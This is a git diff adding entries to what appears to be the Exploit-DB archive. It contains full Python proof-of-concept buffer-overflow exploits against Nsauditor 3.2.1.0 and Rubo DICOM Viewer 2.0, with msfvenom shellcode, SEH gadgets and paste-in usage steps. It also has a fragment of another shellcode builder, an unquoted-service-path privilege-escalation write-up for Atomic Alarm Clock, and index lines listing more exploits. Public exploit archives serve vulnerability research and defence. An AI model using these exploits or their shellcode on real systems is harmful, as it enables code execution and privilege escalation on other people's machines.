+callWinExec  = '\x33\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x33\xC0\x03\xC4\x41\x51\x50\xFF\xD3'
+
+shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec
+
+buffer      = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode
+filler      = '\x77'*(9000-len(buffer))
+buffer      = buffer+filler
+
+try:
+    payload   = buffer
+    f         = open(File, 'w')
+    f.write(payload)
+    f.close()
+    print File + " created successfully"
+except:
+    print File + ' failed to create'
\ No newline at end of file
diff --git a/exploits/windows/local/48350.py b/exploits/windows/local/48350.py
new file mode 100755
index 000000000..f0465e041
--- /dev/null
+++ b/exploits/windows/local/48350.py
@@ -0,0 +1,108 @@
+# Exploit Title: Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))
+# Date: 2020-04-17
+# Exploit Author: Cervoise
+# Vendor Homepage: https://www.nsauditor.com/
+# Software Link: https://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Version: 3.2.1.0 and 3.0.28
+# Tested on: Windows 10.0.18363.778 x86 Pro EN
+
+# Exploit originally found on Nsauditor 3.0.28.0 by ACHILLES 
+(https://www.exploit-db.com/exploits/46005)
+# Latest version Nsauditor 3.2.1.0 (4/13/2020 1:51:53) is still 
+vulnerable
+
+# 1 -> Change the shellcode with the one you want
+# 2 -> Open nsauditor-3-2-1-exploit.txt and copy content to clipboard
+# 3 -> Open Nsauditor
+# 4 -> In the Window select "Tools" -> "Dns Lookup"
+# 5 -> Paste the content into the Field: "Dns Query'"
+# 6 -> Click "Resolve"
+
+#!/usr/bin/python3
+
+# Badchars -> 
+\x00\x0a\x0d\x2e\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9f\xf0\xf1\xf2\xf3\xf4\xf5\xf6
+# Maybe less badchars between \x80 and \x9f but I was lazy (I just 
+checked thoose I needed)
+
+# msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed -f python -v 
+shellcode
+shellcode =  b""
+shellcode += b"\x89\xe7\xd9\xe9\xd9\x77\xf4\x59\x49\x49\x49"
+shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43"
+shellcode += b"\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30"
+shellcode += b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+shellcode += b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
+shellcode += b"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x6e\x62\x73"
+shellcode += b"\x30\x37\x70\x75\x50\x35\x30\x6f\x79\x68\x65"
+shellcode += b"\x36\x51\x6f\x30\x43\x54\x4e\x6b\x70\x50\x30"
+shellcode += b"\x30\x4e\x6b\x43\x62\x56\x6c\x4c\x4b\x73\x62"
+shellcode += b"\x54\x54\x6c\x4b\x61\x62\x65\x78\x36\x6f\x58"
+shellcode += b"\x37\x71\x5a\x56\x46\x66\x51\x49\x6f\x6e\x4c"
+shellcode += b"\x65\x6c\x51\x71\x53\x4c\x43\x32\x46\x4c\x47"
+shellcode += b"\x50\x6f\x31\x4a\x6f\x66\x6d\x46\x61\x79\x57"
+shellcode += b"\x69\x72\x69\x62\x46\x32\x36\x37\x4c\x4b\x63"
+shellcode += b"\x62\x76\x70\x4c\x4b\x63\x7a\x45\x6c\x6e\x6b"
+shellcode += b"\x72\x6c\x47\x61\x62\x58\x79\x73\x77\x38\x55"
+shellcode += b"\x51\x7a\x71\x72\x71\x6e\x6b\x62\x79\x57\x50"
+shellcode += b"\x37\x71\x78\x53\x4e\x6b\x57\x39\x72\x38\x5a"
+shellcode += b"\x43\x54\x7a\x61\x59\x4e\x6b\x57\x44\x4c\x4b"
+shellcode += b"\x45\x51\x39\x46\x30\x31\x79\x6f\x6e\x4c\x5a"
+shellcode += b"\x61\x4a\x6f\x44\x4d\x63\x31\x79\x57\x76\x58"
+shellcode += b"\x49\x70\x51\x65\x69\x66\x76\x63\x43\x4d\x58"
+shellcode += b"\x78\x45\x6b\x51\x6d\x57\x54\x64\x35\x48\x64"
+shellcode += b"\x46\x38\x6c\x4b\x42\x78\x67\x54\x36\x61\x6a"
+shellcode += b"\x73\x31\x76\x6c\x4b\x44\x4c\x52\x6b\x6c\x4b"
+shellcode += b"\x66\x38\x65\x4c\x57\x71\x4a\x73\x6e\x6b\x36"
+shellcode += b"\x64\x4e\x6b\x47\x71\x38\x50\x6d\x59\x42\x64"
+shellcode += b"\x35\x74\x51\x34\x31\x4b\x33\x6b\x70\x61\x42"
+shellcode += b"\x79\x43\x6a\x50\x51\x6b\x4f\x4d\x30\x33\x6f"
+shellcode += b"\x63\x6f\x43\x6a\x4e\x6b\x77\x62\x7a\x4b\x6e"
+shellcode += b"\x6d\x53\x6d\x50\x6a\x67\x71\x4e\x6d\x6c\x45"
+shellcode += b"\x4e\x52\x73\x30\x37\x70\x75\x50\x72\x70\x35"
+shellcode += b"\x38\x46\x51\x4e\x6b\x52\x4f\x4f\x77\x4b\x4f"
+shellcode += b"\x38\x55\x6f\x4b\x4c\x30\x6e\x55\x6c\x62\x71"
+shellcode += b"\x46\x53\x58\x4f\x56\x6d\x45\x6d\x6d\x6d\x4d"
+shellcode += b"\x39\x6f\x58\x55\x47\x4c\x44\x46\x43\x4c\x74"
+shellcode += b"\x4a\x6b\x30\x49\x6b\x59\x70\x34\x35\x47\x75"
+shellcode += b"\x6f\x4b\x50\x47\x56\x73\x73\x42\x70\x6f\x53"
+shellcode += b"\x5a\x67\x70\x51\x43\x4b\x4f\x6b\x65\x31\x73"
+shellcode += b"\x70\x61\x52\x4c\x30\x63\x73\x30\x41\x41"
+
+
+# 0x006ea017 : pop esi # pop ecx # ret  | startnull 
+{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False, 
+SafeSEH: False, OS: False, v3.0.28.0 (C:\Program 
+Files\Nsauditor\Nsauditor.exe)
+# 0x006ea017 : pop esi # pop ecx # ret  | startnull 
+{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False, 
+SafeSEH: False, OS: False, v3.2.1.0 (C:\Program 
+Files\Nsauditor\Nsauditor.exe)
+
+pop_pop_ret = b"\x17\xa0\x6e"
+jmp_back = b"\xeb\xc3\x90\x90"  #JMP    0xffffffc5
+
+# An address near the end of our buffer is on the stack, only three pop 
+are needed to get it
+# Then we just have to moving at the begging of our buffer
+# An egghunter does the job, but will not be compatible with all Windows 
+versions
+going_back = b"\x58"            #POP EAX
+going_back += b"\x58"           #POP EAX
+going_back += b"\x58"           #POP EAX
+going_back += b"\x83\xE8\x79"   #SUB   EAX,0x79
+going_back += b"\x83\xE8\x79"   #SUB   EAX,0x79
+going_back += b"\x83\xE8\x79"   #SUB   EAX,0x79
+going_back += b"\x83\xE8\x79"   #SUB   EAX,0x79
+going_back += b"\x83\xE8\x79"   #SUB   EAX,0x79
+going_back += b"\xFF\xE0"       #JMP EAX
+
+buffer = b"\x90"*(5235-len(shellcode)-len(going_back)-100)
+buffer += shellcode + b"\x90"*100
+buffer += going_back
+buffer += jmp_back + pop_pop_ret #nSEH / SEH
+
+# Write the exploit
+file = open("nsauditor-3-2-1-exploit.txt", "wb")
+file.write(buffer)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48351.py b/exploits/windows/local/48351.py
new file mode 100755
index 000000000..19cec71f6
--- /dev/null
+++ b/exploits/windows/local/48351.py
@@ -0,0 +1,54 @@
+# Exploit Title: Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)
+# Exploit Author: bzyo
+# Date: 2020-04-17
+# Vulnerable Software: Rubo Medical Imaging - DICOM Viewer 2.0
+# Vendor Homepage: http://www.rubomedical.com/
+# Version: 2.0
+# Software Link : http://www.rubomedical.com/download/index.php
+# Tested Windows 7 SP1 x86
+#
+#
+# PoC
+# 1. generate overview.txt, copy contents to clipboard
+# 2. open application
+# 3. select send dicom files, edit
+# 4. paste contents from clipBoard to "DICOM server name" field
+# 6. pop calc
+
+#!/usr/bin/python
+
+import struct
+
+junk1 = "A"*1868
+
+#0x00402f0e : pop ecx # pop ebp # ret 0x04[Overview.exe]
+seh = struct.pack('<L',0x00402f0e)
+
+jmp1 = "\xeb\xf8\xcc\xcc"
+
+jmp2 = "\xe9\x11\xFF\xFF\xFF\x90"
+
+#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0d" -f c
+#Payload size: 220 bytes
+calc = ("\xd9\xc3\xba\x3a\xf3\xa8\x97\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
+"\x31\x31\x53\x18\x03\x53\x18\x83\xc3\x3e\x11\x5d\x6b\xd6\x57"
+"\x9e\x94\x26\x38\x16\x71\x17\x78\x4c\xf1\x07\x48\x06\x57\xab"
+"\x23\x4a\x4c\x38\x41\x43\x63\x89\xec\xb5\x4a\x0a\x5c\x85\xcd"
+"\x88\x9f\xda\x2d\xb1\x6f\x2f\x2f\xf6\x92\xc2\x7d\xaf\xd9\x71"
+"\x92\xc4\x94\x49\x19\x96\x39\xca\xfe\x6e\x3b\xfb\x50\xe5\x62"
+"\xdb\x53\x2a\x1f\x52\x4c\x2f\x1a\x2c\xe7\x9b\xd0\xaf\x21\xd2"
+"\x19\x03\x0c\xdb\xeb\x5d\x48\xdb\x13\x28\xa0\x18\xa9\x2b\x77"
+"\x63\x75\xb9\x6c\xc3\xfe\x19\x49\xf2\xd3\xfc\x1a\xf8\x98\x8b"
+"\x45\x1c\x1e\x5f\xfe\x18\xab\x5e\xd1\xa9\xef\x44\xf5\xf2\xb4"
+"\xe5\xac\x5e\x1a\x19\xae\x01\xc3\xbf\xa4\xaf\x10\xb2\xe6\xa5"
+"\xe7\x40\x9d\x8b\xe8\x5a\x9e\xbb\x80\x6b\x15\x54\xd6\x73\xfc"
+"\x11\x28\x3e\x5d\x33\xa1\xe7\x37\x06\xac\x17\xe2\x44\xc9\x9b"
+"\x07\x34\x2e\x83\x6d\x31\x6a\x03\x9d\x4b\xe3\xe6\xa1\xf8\x04"
+"\x23\xc2\x9f\x96\xaf\x2b\x3a\x1f\x55\x34")
+
+junk2 = "\x90"*14
+
+buffer = junk1 + calc + junk2 + jmp2 + jmp1 + seh 
+
+with open("overview.txt","wb") as f:
+    f.write(buffer[:-1])
\ No newline at end of file
diff --git a/exploits/windows/local/48352.txt b/exploits/windows/local/48352.txt
new file mode 100644
index 000000000..c14de10d9
--- /dev/null
+++ b/exploits/windows/local/48352.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path
+# Exploit Author: boku
+# Date: 2020-04-17
+# Vendor Homepage: http://www.drive-software.com
+# Software Link: http://www.drive-software.com/download/ataclock.exe
+# Version: 6.3
+# Tested On: Windows 10 Pro 1909 (32-bit)
+# Vulnerability Type: Local Privilege Escalation by unquoted service path owned by 'LocalSystem'.
+
+# Vulnerability Description:
+# The Atomic Alarm Clock service "timeserv.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. 
+# This security misconfiguration by the vendor can be exploited locally or as part of an attack chain. 
+# By placing a file named "Program.exe" on the root drive, an attacker can obtain persistent arbitrary code execution. 
+# Under normal environmental conditions, this exploit ensures escalation of privileges from Admin to SYSTEM.
+
+C:\Users\boku>sc qc AtomicAlarmClock
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AtomicAlarmClock
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Atomic Alarm Clock\timeserv.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Atomic Alarm Clock Time
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a000a46d8..d9e162f6a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11032,6 +11032,10 @@ id,file,description,date,author,type,platform,port
 48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos,
 48339,exploits/windows/local/48339.py,"Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)",2020-04-17,"Bailey Belisario",local,windows,
 48344,exploits/windows/local/48344.py,"Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE",2020-04-17,T3jv1l,local,windows,
+48346,exploits/windows/local/48346.py,"Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)",2020-04-20,boku,local,windows,
+48350,exploits/windows/local/48350.py,"Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))",2020-04-20,Cervoise,local,windows,
+48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,
+48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18103,6 +18107,7 @@ id,file,description,date,author,type,platform,port
 48336,exploits/windows/remote/48336.rb,"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,windows,
 48338,exploits/multiple/remote/48338.rb,"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)",2020-04-16,Metasploit,remote,multiple,
 48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
+48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42584,3 +42589,5 @@ id,file,description,date,author,type,platform,port
 48340,exploits/ios/webapps/48340.txt,"Playable 9.18 iOS - Persistent Cross-Site Scripting",2020-04-17,Vulnerability-Lab,webapps,ios,
 48341,exploits/php/webapps/48341.txt,"TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection",2020-04-17,Vulnerability-Lab,webapps,php,
 48342,exploits/hardware/webapps/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",webapps,hardware,
+48345,exploits/php/webapps/48345.txt,"Centreon 19.10.5 - 'id' SQL Injection",2020-04-20,"Basim Alabdullah",webapps,php,
+48348,exploits/php/webapps/48348.txt,"Fork CMS 5.8.0 - Persistent Cross-Site Scripting",2020-04-20,Vulnerability-Lab,webapps,php,